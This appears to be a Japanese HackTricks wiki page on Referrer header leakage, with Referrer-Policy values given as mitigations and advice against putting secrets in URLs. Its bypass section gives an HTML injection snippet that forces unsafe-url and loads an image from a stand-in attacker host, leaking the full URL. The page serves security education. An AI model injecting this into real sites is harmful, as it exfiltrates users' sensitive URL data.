hacktricks/todo/interesting-http.md
2024-04-06 18:36:04 +00:00

4 KiB
Raw Blame History

AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)

HackTricksをサポートする他の方法:

Referrerヘッダーとポリシー

Referrerは、ブラウザが前に訪れたページを示すために使用するヘッダーです。

漏洩した機密情報

ウェブページ内のどこかでGETリクエストのパラメータに機密情報がある場合、ページに外部ソースへのリンクが含まれているか、攻撃者がユーザーに攻撃者がコントロールするURLを訪れるように仕向けるソーシャルエンジニアリングことができれば、最新のGETリクエスト内の機密情報を外部に流出させる可能性があります。

軽減策

ブラウザにReferrer-policyに従わせることで、機密情報が他のウェブアプリケーションに送信されるのを避けることができます:

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

対策回避

このルールはHTMLメタタグを使用して上書きすることができます攻撃者はHTMLインジェクションを悪用する必要があります

<meta name="referrer" content="unsafe-url">
<img src="https://attacker.com">

防御

URLのGETパラメーターやパス内に機密データを決して含めないでください。

htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ

HackTricksをサポートする他の方法: